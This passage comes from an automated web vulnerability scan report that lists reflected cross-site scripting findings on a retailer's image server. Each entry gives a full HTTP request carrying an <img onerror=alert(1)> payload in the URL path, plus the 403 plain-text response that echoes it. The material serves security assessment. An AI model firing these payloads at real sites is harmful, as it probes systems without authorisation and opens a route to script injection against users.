Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8761157_01e84a7<img src=a onerror=alert(1)>970d3c015fe

3.211. http://images3.pacsun.com/is/image/pacsunproducts/8768160_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8768160_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a was submitted in the REST URL parameter 4. This input was echoed as ddf3c<img src=a onerror=alert(1)>5d5e2808b3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8768160_01ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8768160_01ddf3c<img src=a onerror=alert(1)>5d5e2808b3a

3.212. http://images3.pacsun.com/is/image/pacsunproducts/8768632_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8768632_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f was submitted in the REST URL parameter 4. This input was echoed as 3e3d3<img src=a onerror=alert(1)>8202863975f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8768632_013e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8768632_013e3d3<img src=a onerror=alert(1)>8202863975f

3.213. http://images3.pacsun.com/is/image/pacsunproducts/8770505_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8770505_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf was submitted in REST URL parameter 4 and was echoed back as f8094<img src=a onerror=alert(1)>da63b1adfaf in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8770505_01f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:54 GMT
Connection: close

Unable to find /pacsunproducts/8770505_01f8094<img src=a onerror=alert(1)>da63b1adfaf

3.214. http://images3.pacsun.com/is/image/pacsunproducts/8771172_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8771172_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396 was submitted in REST URL parameter 4 and was echoed back as d64c9<img src=a onerror=alert(1)>0d594fd3396 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8771172_01d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8771172_01d64c9<img src=a onerror=alert(1)>0d594fd3396

3.215. http://images3.pacsun.com/is/image/pacsunproducts/8778102_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8778102_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload 343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3 was submitted in REST URL parameter 4 and was echoed back as 343d7<img src=a onerror=alert(1)>dbbe95a5ea3 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8778102_01343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:12 GMT
Connection: close

Unable to find /pacsunproducts/8778102_01343d7<img src=a onerror=alert(1)>dbbe95a5ea3

3.216. http://images3.pacsun.com/is/image/pacsunproducts/8787210_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787210_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755 was submitted in REST URL parameter 4 and was echoed back as eca8c<img src=a onerror=alert(1)>96263e8f755 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8787210_01eca8c<img%20src%3da%20onerror%3dalert(1)>96263e8f755?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8787210_01eca8c<img src=a onerror=alert(1)>96263e8f755

3.217. http://images3.pacsun.com/is/image/pacsunproducts/8787798_01_080 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_01_080

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19 was submitted in REST URL parameter 4 and was echoed back as cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8787798_01_080cbf6a<img%20src%3da%20onerror%3dalert(1)>6cbaf6bbc19?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8787798_01_080cbf6a<img src=a onerror=alert(1)>6cbaf6bbc19

3.218. http://images3.pacsun.com/is/image/pacsunproducts/8787798_sw_080 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_sw_080

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload 53156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85 was submitted in REST URL parameter 4 and was echoed back as 53156<img src=a onerror=alert(1)>1ede4f59a85 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8787798_sw_08053156<img%20src%3da%20onerror%3dalert(1)>1ede4f59a85?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8787798_sw_08053156<img src=a onerror=alert(1)>1ede4f59a85

3.219. http://images3.pacsun.com/is/image/pacsunproducts/8787798_sw_945 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8787798_sw_945

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266 was submitted in REST URL parameter 4 and was echoed back as d44c8<img src=a onerror=alert(1)>f4e2e92266 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8787798_sw_945d44c8<img%20src%3da%20onerror%3dalert(1)>f4e2e92266?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8787798_sw_945d44c8<img src=a onerror=alert(1)>f4e2e92266

3.220. http://images3.pacsun.com/is/image/pacsunproducts/8795452_01_020 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8795452_01_020

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351 was submitted in REST URL parameter 4 and was echoed back as ced2e<img src=a onerror=alert(1)>50ade7bf351 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8795452_01_020ced2e<img%20src%3da%20onerror%3dalert(1)>50ade7bf351?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:04 GMT
Connection: close

Unable to find /pacsunproducts/8795452_01_020ced2e<img src=a onerror=alert(1)>50ade7bf351

3.221. http://images3.pacsun.com/is/image/pacsunproducts/8805558_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8805558_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload 61996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e was submitted in REST URL parameter 4 and was echoed back as 61996<img src=a onerror=alert(1)>a6903d9492e in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8805558_0161996<img%20src%3da%20onerror%3dalert(1)>a6903d9492e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
